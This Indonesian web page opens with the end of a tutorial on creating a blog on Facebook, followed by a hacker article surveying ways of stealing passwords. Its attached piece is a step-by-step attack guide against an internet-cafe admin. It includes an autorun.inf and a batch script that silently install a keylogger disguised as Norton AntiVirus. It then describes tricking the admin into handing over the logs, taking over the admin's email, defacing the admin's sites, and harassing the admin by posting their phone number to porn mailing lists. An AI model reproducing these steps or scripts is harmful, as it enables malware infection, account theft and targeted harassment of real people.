Anda bisa membuat beberapa kategori lainnya dengan cara yang sama. Jika demikian, maka nantinya di bagian Categories akan muncul nama-nama kategori yang telah Anda buat. Kali ini anda harus bisa membuat blog entry dengan mengklik [Create New Blog Entry].

Langkah 12
Sebenarnya untuk aplikasi blog buatan Shujaat Bin Tariq ini memiliki fitur WYSIWYG editor, namun saat artikel ini disusun ternyata masih terdapat perbaikan. Karena itu kali ini tampilannya tak ubahnya dengan basic editor. Masukkan nama judul pada title dan pilih kategori yang anda inginkan.

Langkah 13
Anda bisa memasukkan artikel blog anda di bagian yang telah disediakan, sayangnya kali ini fitur WYSIWYG editor masih belum berfungsi. Tetapi anda bisa menyertakan link video youtube disini.

Langkah 14
Untuk memasukkan video dari youtube, cari video yang anda cari menggunakan fasiltas search di youtube.

Langkah 15
Setelah anda mendapatkan hasil dari pencarian video, klik salah satu yang anda inginkan. Lalu copy alamat URL dari video tersebut.

Langkah 16
Masukkan URL dari video yang anda dapatkan dari youtube di bagian video URL.

Langkah 17
Setelah semuanya anda yakini telah terisi dengan benar, klik [Publish].

Langkah 18
Kemudian anda akan dapatkan pesan bahwa blog anda telah selesai dibuat.

Alternatif lainnya blog di Facebook adalah sama dengan cara pertama, klik ‘Blog’ pada bagian search didalam fb. Pilihlah aplikasi blog urutan kedua yang dibuat oleh Alastair Paterson. Caranya mudah saja ko, tinggal anda ikutin saja.

Akhirnya, selamat anda sudah punya Blog di Facebook. Silahkan mencoba dengan yang lainnya.

Bagaimana Cara Para Hacker mendapatkan Password Anda


: Table oF Contents :
---------------------
0 [0XFF00000] Preface
0 [0XFFF0000] Bagaimana Mendapatkannya?
[1]. Social Engineering
[2]. KeyLogger
[3]. Web Spoofing
[4]. Menghadang Email
[5]. Password Cracking
[6]. Session Hijacking
[7]. Menjadi Proxy Server
[8]. Memanfaatkan Kelalaian User Dalam Penggunaan Fitur Browser
[9]. Googling
0 [0XFFFF000] Penutup
0 [0XFFFFF00] Referensi
0 [0XFFFFFF0] Shoutz
0 [0XFFFFFFF] Attachment[Pembalasan Untuk Sang Admin - SOcial Engineering]



0 [0XFF00000] Preface

Pencurian password, pengambilalihan account, merupakan hal yang sering terjadi
di dunia cyber. Bukan hal yang sulit untuk melakukannya, namun banyak para
newbie yang terus saja bertanya-tanya.. "Bagaimana cara mendapatkan password
email orang lain?" atau pertanyaan yang paling sering saya terima ialah..
"Bagaimana cara anda mendapatkan password saya?" :P

Untuk pertanyaan-pertanyaan itulah artikel ini ditulis, semoga bisa menambah
wawasan anda dan membuka pikiran anda tentang betapa pentingnya menjaga
account saat berada di tempat-tempat rawan.


0 [0XFFF0000] Bagaimana Mendapatkannya?


Ada banyak cara untuk mendapatkan suatu password. Beberapa diantaranya tidak
membutuhkan keahlian khusus. Berikut adalah cara-cara yang paling umum dan
paling sering digunakan:

[1]. Social Engineering
[2]. KeyLogger
[3]. Web Spoofing
[4]. Menghadang Email
[5]. Password Cracking
[6]. Session Hijacking
[7]. Menjadi Proxy Server
[8]. Memanfaatkan Kelalaian User Dalam Penggunaan Fitur Browser
[9]. Googling


[1]. Social Engineering

Social Engineering adalah nama suatu tehnik pengumpulan informasi dengan
memanfaatkan celah psikologi korban. Atau mungkin boleh juga dikatakan sebagai
"penipuan" :P Sosial Engineering membutuhkan kesabaran dan kehati-hatian agar
sang korban tidak curiga. Kita dituntut untuk kreatif dan mampu berpikiran
seperti sang korban.

Social Engineering merupakan seni "memaksa" orang lain untuk melakukan sesuatu
sesuai dengan harapan atau keinginan anda. Tentu saja "pemaksaan" yang
dilakukan tidak secara terang-terangan atau diluar tingkah laku normal yang
biasa dilakukan sang korban.

Manusia cenderung untuk percaya atau mudah terpengaruh terhadap orang yang
memiliki nama besar, pernah (atau sedang berusaha) memberikan pertolongan,
dan memiliki kata-kata atau penampilan yang meyakinkan. Hal ini sering
dimanfaatkan pelaku social engineering untuk menjerat korbannya. Seringkali
sang pelaku membuat suatu kondisi agar kita memiliki semacam ketergantungan
kepadanya.Ya,tanpa kita sadari dia mengkondisikan kita dalam suatu masalah dan
membuat ( seolah - olah hanya ) dialah yang bisa mengatasi masalah itu. Dengan
demikian,tentu kita akan cenderung untuk menuruti apa yang dia instruksikan
tanpa merasa curiga.

Sosial Engineering adakalanya menjadi ancaman serius. Memang sepertinya tidak
ada kaitan dengan teknologi, namun sosial engineering tetap layak diwaspadai
karena bisa berakibat fatal bagi sistem anda. Why?? Karena bagaimanapun juga
suatu komputer tetap saja tidak bisa lepas dari manusia. Ya, tidak ada satu
sistem komputerpun di muka bumi ini yang bisa lepas dari campur tangan
manusia. ehebat apapun pertahanan anda, jika anda sudah dikuasai oleh attacker
melalui social engineering, maka bisa jadi anda sendirilah yang membukakan
jalan masuk bagi sang attacker.

# Contoh Social Engineering sederhana:
Baca Attachment[Pembalasan Untuk Sang Admin - SOcial Engineering]


[2]. KeyLogger

KeyLogger adalah software yang dapat merekam aktivitas user. Hasil rekaman itu
biasa disimpan berupa teks atau gambar. KeyLogger bekerja berdasarkan ketukan
keyboard user. Aplikasi ini mampu mengenali form-form sensitif seperti form
password misalnya.

Ada cara aman untuk menghindari keyloger:
1. Gunakan password dengan karakter special seperti !@#$%^&*(){}[]. Kebanyakan
keyloger akan mengabaikan karakter ini sehingga sang pelaku (pemasang
keyloger) tidak akan mendapatkan password anda yang sebenarnya.

2. Persiapkan password dari rumah, simpan dalam bentuk teks. Saat ingin
memasukkan password, tingal copy-paste ajah. Keyloger akan membaca password
anda berdasarkan ketukan keyboard. Namun cara ini agak beresiko. Mengapa?
karena saat anda melakukan copy, data anda akan tersimpan di clipboard. Saat
ini banyak dijumpai software-software gratis yang bisa menampilkan data dalam
clipboard.


[3]. Web Spoofing

Masih ingat kasus pecurian Account sejumlah nasabah Bank BCA? Ya, itulah salah
satu contoh nyata dari Web spoofing. Inti dari tehnik ini ialah dengan
memanfaatkan kesalahan user saat mengetikkan alamat situs pada address bar.
Pada dasarnya, Web Spoofing adalah usaha untuk menipu korban agar mengira dia
sedang mengakses suatu situs tertentu, padahal bukan.

Pada kasus bank BCA, pelaku membuat situs yang sangat mirip dan identik dengan
situs aslinya sehingga sang korban yang terkecoh tidak akan merasa ragu
mengisikan informasi sensitif seperti user name dan Passwordnya. Padahal,
karena situs tersebut adalah situs tipuan, maka semua informasi berharga tadi
terekam oleh webserver palsu, yaitu milik sang pelaku.


[4]. Menghadang Email

Menghadang email? Ya, dan sangat mudah untuk melakukan hal ini. Salah satu
cara adalah dengan menggunakan mailsnarf yang terdapat pada utility dsniff.
Cara kerja Mailsnarf adalah dengan menghadang paket data yang lewat di
Internet dan menyusunnya menjadi suatu email utuh.

Dsniff dan mailsnift merupakan software bekerja atas dasar WinPcap (setara
dengan libcap pada Linux) yaitu suatu library yang menangkap paket-paket data.
Paket-paket yang ditangkap ini akan disimpan dalam bentuk file oleh Windump,
sedangkan Dsniff dan MailSnarf bertindak lebih jauh lagi yaitu menganalisa
paket-paket data ini dan menampilkan password (dsniff) atau isi email
(mailsnarf).

Baca artikel terkait pada arsip lama :)


[5]. Password Cracking

"Hacking while sleeping." itulah ungkapan yang biasa dipakai oleh orang-orang
yang melakukan password cracking. Mengapa? Karena pada umumnya dibuthkan waktu
yang lama untuk melakukan pasword cracking. Bisa berjam-jam, bahkan berhari -
hari! Semua itu tergantung dari target, apakah sang target menggunakan
password yang umum, password memiliki panjang karakter yang tidak biasa, atau
password memiliki kombinasi dengan karakter-karakter special.

Salah satu software yang biasa digunakan untuk melakukan hal ini ialah dengan
mengunakan Brutus, salah satu jenis software remote password cracker yang
cukup terkenal. Brutus bekerja dengan teknik dictionary attack atau
bruce-force attack terhadap port-port http, POP3,ftp, telnet, dan NetBIOS.

Dictionary Attack bekerja dengan mencobakan kata-kata yang ada dalam kamus
password. Sedangkan brute - force attack bekerja dengan mencobakan semua
kombinasi huruf, angka, atau karakter.

Brute Force Atack bekerja sangat lambat dan membutuhkan waktu yang lama
tergantung dari jenis spesifikasi komputernya dan panjang karakter
passwordnya. Saat ini telah banyak situs yang menutup akses terhadap akses
terhadap usaha login yang secara terus-menerus tidak berhasil.

Jika anda ingin melakukan password Cracking, silahkan pilih - pilih sendiri
aplikasinya di halaman Member - spyrozone.net.


[6]. Session Hjacking

Session hijacking dewasa ini semakin marak dikalangan para attacker. Session
Hijacking biasa dilakukan dengan melakukan peniruan cookies. Jadi pada
intinya, kita harus bisa meniru cookies sang korban untuk mendapatkan sesi
loginnya.

Lalu bagaimana cara mendapatkan cookies sang korban?
1. Dengan analisa Cookies. Cara ini relatif sulit dilakukan.
2. Mencuri Cokies.
Misalnya Sang Attacker ingin mendapatkan account si A. Sang Attacker bisa
dengan mudah membuat semacam script Java Script yang disisipkan dalam email
untuk dikirim ke korban.Saat korban membuka email itu, tanpa sadar cookiesnya
akan dicuri dan direkam ke suatu webserver dengan memanfaatkan suatu script
PHP.

Belakangan ini yang paling sering menjadi incaran adalah account Friendster.
Ada yang menyisipkan suatu scipt lewat testimonial, ada yang menyisipkannya di
profilnya sendiri untuk mencuri cookies sang korban dan lain sebagainya. Saya
memiliki tips untuk ini:

1. Jangan menggunakan browser InternetExplorer saat ingin membuka profil orang
lain. Catat alamat profil yang ingi anda lihat,logout terlebih dahulu dari
account anda dan bersihkan semua cookies, baru kemudian bukalah profil
Friendster tujuan.
2. Ketika menerima testimonial, periksa terlebih dahulu source codenya. Apakah
disana terdapat script asing atau kata-kata yang identik dengan pembajakan
seperti : "HACKED", "DEFACED", "OWNED".. dll.. Jika ragu-ragu....... reject
ajah..
3. Waspada ketika tanpa suatu alasan yang jelas tiba-tiba anda logout dengan
sendirinya dari account anda. Saat anda diminta memasukkan username dan
password, lihat dulu addressbar anda! apakan anda sedang berada di situs
yang semestinya atau tidak. Periksa source code halaman tersebut.Lihat pada
form action, kemana informasi anda nantinya akan dikirim.

Sebenarnya session hijacking bisa dicegah jika saja sang penyedia layanan
memperhatikan hal-hal berikut:

1. Menetapkan session identifier yang unik
2. Menetapkan sistem identifier berpola acak
3. Session identifier yang independen
4. Session identifier yang bisa dipetakan dengan koneksi client side.

Fenomena lain adalah,hingga saat artikel ini diterbitkan,ternyata masih banyak
dijumpai para user yang tidak melakukan sign out setelah membuka accountnya.
Dengan demikian, orang lain yang mengunakan komputer itu dan membuka website
yang sama dengan yang telah dibuka oleh orang pertama akan otomatis login ke
account sang korban.


[7]. Menjadi Proxy Server

Kita bisa mengumpulkan informasi dengan menjadi proxy server bagi korban
untuk dapat berselancar. Dengan menjadi proxy server, seluruh identitas sang
peselancar bisa menjadi milik kita.


[8]. Memanfaatkan Kelalaian user dalam penggunaan fitur browser

Setiap browser tentunya memiliki fitur yang ditujukan untuk kemudahan dan
kenyamanan penggunanya dalam berselancar. Diantaranya ialah dengan adanya
cache dan Password Manager.

Di Internet tentunya banyak suatu website yang isinya tidak berubah dalam
beberapa hari (Contohnya spyrozone.net nich.. hehehe ;) Nah, untuk situs yang
seperti ini cache menjadi hal yang sangat berguna. Cache akan menyimpan
file-file hasil browsing sehinga nantinya jika anda berkunjung lagi ke situs
tersebut browser tidakperlu lagi melakukan download untuk kedua kalinya dari
server sehingga setiap halaman situs yang telah anda buka sebelumnya akan
terbuka dengan lebih cepat. Semua itu biasanya diatur oleh header time to
live.

Lho, bagaimana dengan situs-situs penyedia berita yang selalu up to date?
Untuk site yang seperti itu, time to live-nya akan di set=0 sehinga nantinya
anda akan terus melakukan download setiap kali berkunjung.

Cukup nyaman bukan? Ya, tapi ancaman mulai timbul. Cobalah kini anda jelajahi
opsi-opsi yang berkaitan dengan cache pada browser anda. Tentu anda bisa
menemui bahwa ada fasilitas untuk menentukan berapa besarnya file temporary
yang bisa disimpan di harddisk. Cari juga lokasi dimana file-file tersebut
akan disimpan.

Coba anda buka folder tersebut, anda akan menemui file-file html & file-file
gambar dari site-site yang sudah anda kunjungi. Pada Browser IE, anda bisa
melihat lokasi file cache dengan menjelajahi menu Tools ---> Internet options
---> Settings

Lalu apa yang bisa didapatkan?? toh cuma file-file "sampah"?? Hmm... sekarang
coba anda copy semua file yang ada di sana ke suatu folder. Lalu bukalah
salah-satu file htmlnya. Jika itu komputer publik,anda bisa mengetahui situs
apa saja yang telah diakses oleh oleh orang sebelum anda.

Hmm.. hanya dengan melihat file temporary anda bahkan bisa melihat password
dan dll.Banyak saya temui situs yang menyimpan password dan menampilkannya
pada url. Tentunya anda juga pasti sering membacanya di berbagai tutorial.

Kebanyakan browser pada saat ini memiliki fasilitas untuk menyimpan password.
Misalnya saat meggunakan Mozilla Firefox, anda pasti sering menerima kotak
dialog konfirmasi yang menanyakan apakah anda ingin password anda disimpan
atau tidak oleh PasswordManager.Kebanyakan user cenderung untuk memilih opsi
YES, entah itu dengan penuh kesadaran atau memang mereka tidak tau ( baca:
tidak mau tau) apa maksud dari kotak dialog itu.

Orang lain yang kemudian mengunakan browser itu bisa dengan sangat mudah
mendapatkan password korban dengan memasuki menu Tools ---> Options --->
Security --> Saved password.

Contoh lain adalah fasilitas wand password yang dimiliki oleh browser Opera.
Saat anda memasukkan user name dan password pada suatu form dan menekan
tombol submit, opera secara default akan meminta konfirmasi kepada anda
apakah anda ingin browser menyimpan id dan password anda atau tidak. Lagi dan
lagi... kebanyakan netter ceroboh, mereka cenderung untuk memilih opsi "YES".

Lalu?? Orang lain yang kemudian menggunakan browser itu bisa melihat
situs apa saja yang telah diakses oleh user, arahkan browser ke situs
tersebut, letakkan cursor pada form isian user name, tekan [ALT]+[ENTER] dan
BOOOMM!!!! Kenapa?? Jangan kaget dulu!! Hehehe.. form login akan otomatis
terisi dengan user name korban lengkap dengan passwordnya ;D (It's fun
enough.. ;)

Ini hanya sebagian kecil contoh, jelajahi fitur-firtur browser lain!


[9]. Googling

Google.com. Banyak sudah situs yang runtuh, password dan nomor - nomor kartu
kredit yang dicuri akibat dari ulah orang yang menyalahgunaan kesaktiannya ;)
Dahulu, hal ini mudah dilakukan.Hanya dengan mengetikkan kata kunci tertentu
yang berkaitan dengan user name dan password, anda bisa memanen ratusan
password user melalui google. Tapi sekarang tampaknya anda harus gigit jari
jika menggunakan cara diatas ;D

Jangan sedih dulu karena Google baru saja menelurkan produk barunya, yaitu
Google Code Search. Ancaman baru mulai timbul, "si pintar" ini kini dapat
meng-crawl hingga kepada archive file yang berada di public directory web
server. Hati-hati yang punya kebiasaan untuk menyimpan informasi penting di
dalamnya (password, dan info berharga lainnya) Sebaiknya mulai sekarang
kebiasaan itu dihilangkan. Selalu proteksi folder-folder yang sensitif agar
situs anda bisa hidup lebih lama. Kalo nggak... yach.. tunggu ajah ada orang
yang memanfaatkan produk baru google ini untuk mengeruk informasi sensitif
dari web server anda. dan jika itu sudah terjadi... maka bersiaplah.. "taman
bermain" anda akan diambil alih olehnya..


0 [0XFFFF000] Penutup

Wew... ada banyak cara bukan untuk mendapatkan account orang lain?? So, selalu
berhati-hatilah. Waspada selalu saat berada di tempat umum, bahkan saat berada
di komputer pribadi anda sekalipun karena bisa jadi teman anda atau siapapun
yang meminjam komputer anda memiliki tujuan yang kurang baik.

Sekian, semoga bermanfaat dan bisa menambah pengetahuan anda :)


0 [0XFFFFF00] Referensi

- securityfocus[dot]com
- phrack[dot]org
- spyrozone[dot]tk
- google[dot]com


0 [0XFFFFFF0] Shoutz:

- Vindika Anastasya & Vermouth Anastasya.. The deepest Love I'v ever had.. :)
- All Crack Sky Staff! Hey there.. :)
- ECHOERS, SECTOR-S (wake up guys!!)
- EVILratE, PushMOV, MyzTX, Dr3, Lun4, Clust3r, RX-259, RX-290, RX-313, RX-147
- Mr.Rio, PramayunTA, Alfian, Andien, Taurista, Bachtiar, EQ, WisNU, Arman,
Dani, Rara, Icha, Prita, Vivi, Nabiel, Tika, Kemas, Bomy, Arbi, Tunjung,
Krishna, Rizki..
- All my friend in SMAN 2 SIDOARJO
- All member of www.spyrozone.net .. stay Alert in SPYRO ZONE!!


0 [0XFFFFFFF] Attachment:

Berikut adalah contoh social engineering sederhana. Saya ambil dari tulisan
saya yang berjudul "Pembalasan Untuk Sang Admin"-www.spyrozone.net. Enjoy... ;)


------------------------------------------------------------------


Pembalasan Untuk Sang Admin - SOcial Engineering



May 12, 2006 jam 21:16 malam di depan RedHat tercinta dengan segelas Heineken
Author: SPYRO KiD
CopyLeft (c) 2006 by www.spyrozone.net


|---[Table of Contents

1. Introduction
2. Serangan pertama
3. Serangan kedua
4. Hari pembalasan
5. Cara pencegahan
6. Penutup


1. Introduction

Semakin paranoidnya para admin belakangan ini menyebabkan banyak pengguan jasa
layanan internet cafe (warnet) menjadi kurang nyaman. Restriction (pembatasan)
disana-sini (walaupun semua itu dilakukan bukan tanpa alasan) menjadi salah
satu inspirasi bagi banyak orang untuk mencari-cari cara menerobos segala
keterbatasan itu dan saling men-share pengetahuan mereka. Berbagai jenis
exploit pun dibedah, didiskusikan dan dikemas menjadi artikel untuk para
newbie.

Sejenak para newbie bisa tertawa puas, berjaya, senyum-senyum sendiri sampai
tak jarang lupa diri :P Namun semua itu tentunya tidak bertahan lama. Admin
menjadi semakn pintar. Fasilitas Floppy drive dan CD room drive dihapus dan
melarang user untuk melakukan segala bentuk transfer file dari media
penyimpanan sementara (disket, cd, flashdisk) kecuali melalui server terlebih
dahulu. Ini merupakan fenomena yang akhir-akhir ini bisa kita temui dengan
mudah di berbagai Internet cafe. Admin mulai rajin mengupdate path sehingga
exploit-exploit yang dulu dibangga-banggakan oleh kaum newbie menjadi
"rongsokan" tak berguna.

Sekarang, mari kita bangunkan sang admin dari mimpi indahnya untuk menunjukkan
bahwa menjadi paranoid itu adakalanya tidak baik dan tidak ada system yang
100% secure.


2. Serangan pertama

Kita akan menjadi seorang "agen mata-mata" (hehehe.. gw pake istilah ini biar
ente merasa agak sedikit keren) yang akan merekam segala aktivitas sang admin.
Tujuannya.. banyak! dan salah satunya seperti hal yang banyak diinginkan
orang... mendapatkan password sang admin. Partner kita kali ini adalah
navw32.exe, sebuah keyloger dengan icon Norton AntiVirus yang bisa kamu
dapatkan suka-suka dengan harga cuma-cuma di halaman member www.spyrozone.net
kategori Keyloger. Setelah kamu download keyloger tersebut, ikuti langkah -
langkah berikut:

---[1 Bukalah Notepad kemudian ketik baris script berikut:

[autorun]
open=nav.bat

Klik [file][save] kemudian pada box save as type, pilih All Files dan pada
form isian name beri nama Autorun.inf lalu klik tombol [save].

---[2 Buka lembar baru pada notepad dengan klik menu [file] [new] lalu ketik
script berikut:

@echo off
echo Norton Antivirus 2006
echo Scanning disk drive...
echo Please wait...
copy navw32.exe %windir%\navw32.exe
call %windir%\navw32.exe
echo.
echo.
echo.
echo.
echo.
echo.
echo.
echo. Scanning complette! No virus threat detected!
echo.
cls

Klik [file][save] kemudian pada box save as type, pilih All Files dan pada
form isian name beri nama nav.bat lalu klik tombol [save].

---[3. Persiapkan beberapa file microsoft word documents (bisa diganti dengan
file lain) sebagai tipuan/alasan untuk di transfer. Semakin banyak file,
semakin baik karena file keyloger kamu akan semakin tersamarkan.

---[4. Persiapkan sebuah cd kosong (bekas juga boleh) lalu bakar semua file
diatas (autorun.inf, nav.bat, navw32.exe dan file-file tipuan) kedalam CD.

Sekarang pergilah ke warnet tempat sang admin berkuasa. Bersikaplah seperti
biasa dan jangan gugup selayaknya para koruptor yang sering nampang di
satasion-stasion TI-PI tanpa rasa malu. Setelah kamu login ke billing komputer
user, datangi sang admin. Katakan pada beliau, "Mas/mbak/om/tante/, mau
transfer file dari cd ini. Nama filenya blablabla tolong dikirim ke komputer
nomor blablabla."

Begitu CD dimasukkan, saat itulah terjadi sebuah fenomena berikut:
Komputer akan memproses file autorun.inf secara otomatis ---> file autorun.inf
akan memproses file nav.bat ---> file nav.bat akan menduplikasi file
navw32.exe ke dalam directory windows dan mengaktivkannya ---> Keyloger telah
terinstall, hasil rekamannya akan tersimpan di directory yang sama dengan nama
navw32.dll beratribut hidden.

Perlu diketahui bahwa keyloger ini tidak akan menampilkan kotak dialog dalam
bentuk apapun! So, nggak usah khawatir bakal ketahuan ;)

Sekarang, kamu bisa pulang dengan wajah tanpa dosa dan mungkin (lagi - lagi)
kamu bakalan senyum-senyum sendiri sambil mengelus-elus jenggot kayak habis
menang togel.

Lalu bagaimana cara mengambil file hasil rekaman keyloger di directory windows
sang admin? Ikuti langkah-langkah pada serangan kedua.


3. Serangan kedua

Dua hari Kemudian, datanglah ke warnet itu lagi. Bertingkahlakulah secara
wajar dan beraktivitas seperti layaknya user biasa. Setelah selesai
berinternet ria, datangi sang admin, bayarlah biaya browsing seperti biasa
lalu dengan wajah sangat-sangat memelas seperti pengemis di jalanan :) katakan
pada beliau,"Mas/mbak/om/tante/, komputer saya bermasalah neeh. Menurut pesan
Error yang muncul, file navw32.dll yang berada di directory windows hilang.
File tersebut beratribut hidden. Tolong doong copykan dari komputer ini.
Kebetulan versi windowsnya sama dengan komputer saya.."

Tentu saja biasanya sang admin dengan sangat senang hati akan membantu kamu.
Dengan suka rela dan penuh kesadaran beliau akan mengaktifkan opsi Show All
files pada Folder Options dan mengcopy-kan file navw32.dll dari directory
windows tanpa menyadari bahwa file tersebut bukan file system, namun file
hasil rekaman keyloger.

Berikan disket/cd/flashdisk mu dan setelah file tersebut tersimpan, ucapkan
beribu terima kasih lalu pulanglah ke rumah. Buka file tersebut di rumah. Klik
2x pada file lalu ketika muncul kotak dialog open with, klik opsi select
program from a list dan pilih notepad pada daftar program yang ditampilkan.
Sekarang tentunya kamu bisa leluasa membaca rekaman aktivitas sang admin. Cari
password emailnya dan kamu bisa menuju pada hari pembalasan.


4. Hari Pembalasan

Pilih hari yang tepat, misalnya malam jum'at kliwon dimana sang admin mungkin
sedang terlelap di rumahnya. Nyalakan komputermu dan connectlah ke Internet.
Namun ada baiknya kamu lakukan hal ini di warnet agar lebih aman. Carilah
warnet yang buka 24 jam.

Berbekal hasil rekaman keyloger tadi, loginlah ke account email sang admin.
Setelah puas menjelajahi emailnya, subscriblah ke berbagai mailing list besar
dengan email tersebut. Subscribe sebanyak-banyaknya.

Hohoho.. lalu apa lagi nich?? Kalau sang admin punya blog/website pribadi/
account Friendster.. tentu kamu dengan mudah mendapatkan semua password itu
dengan fasilitas forgot password. Kebanyakan penyedia layanan seperti itu akan
mengirimkan password via email. So, setelah dapat semuanya... heheh... DEFACE
ajah ;) Tapi inget lho, halaman lama harus tetap di backup dan jangan merubah
password apapun!!

Ada ide yang sedikit lebih sadis (ini cuma ide lho.. sebaiknya jangan
dilakukan deech..). Daftarkan emailnya ke berbagai situs - situs porno dan
postinglah sebuah pesan singkat, memikat dan "mematikan". Berikut contohnya
jika milis tersebut berbahasa Indonesia:

Dear all..
gwe lagi nafsu berat neeh, burun telepon gwe doong sekarang juga!! neeh no
telp gwe: 021-blablabla (masukkan no telp sang admin)
gwe tunggu 24 jam lho!!

Atau terserah kamu laah.. saya rasa kamu lebih pintar dalam memilih kata- kata
yang yahuud!! ;D

Maka bisa dipastikan malam itu akan menjadi malam jumat kliwon paling
mengerikan bagi sang admin, lebih mengerikan daripada film-film horor manapun!
Telepon rumahnya akan berdering tanpa henti dibanjiri oleh telepon dari dalam
dan luar negeri dengan maksud pembicaraan yang sudah bisa ditebak apa
maksudnya ;D

Keesokan harinya, setelah menghadapi malam paling mengerikan itu, sang admin
akan kaget 1/2 hidup 1/2 mati mendapati inboxnya penuh dengan email-email dari
berbagai milis yang beliau sendiri tidak merasa pernah bergabung dengan
milis-milis itu. Dan bisa jadi, saat beliau sedang sibuk Unsubcribe dari
milis-milis tersebut, telepon rumahnya masih terus - terusan menjerit - jerit
dengan jeritan indah :D


5. Pencegahan

Jika kamu adalah admin yang tidak mau mengalami nasib seperti diatas, maka
setiap kamu menerima CD dari siapapun..
1. Buka windows explorer
2. Tekan-tahan tombol shift sambil memasukkan CD kedalam CD Room dRive.
3. Setelah CD masuk,tetap tekan tombol shift sampai kira-kira 25 detik.Setelah
itu kamu bisa melepas tombol shift dan mengaksesnya melalui panel sebelah kiri
windows Explorer. Klik pada area folder tree, jangan pada daftar drive sebelah
kanan karena fitur autorun akan aktif.

Dan ingat, jangan terlalu percaya pada siapapun! Ada begitu banyak orang tidak
terduga di sekitar anda!!


6. Penutup

---[+ Kesimpulan
Bisa kita bayangkan sendiri betapa kelalaian sepele bisa menimbulkan dampak
yang sangat berbahaya. Ini hanya merupakan contoh Social Engineering sederhana
namun dampaknya.. bisa anda bayangkan sendiri ;)

Cara diatas sudah saya coba pada 4 buah warnet di sidoarjo dan hasilnya saya
berhasil mendapatkan catatan aktivitas sang admin (password etc..). Tapi untuk
penerapan "PEMBALASAN" tentu saya tidak melakukan hal sekejam itu ;P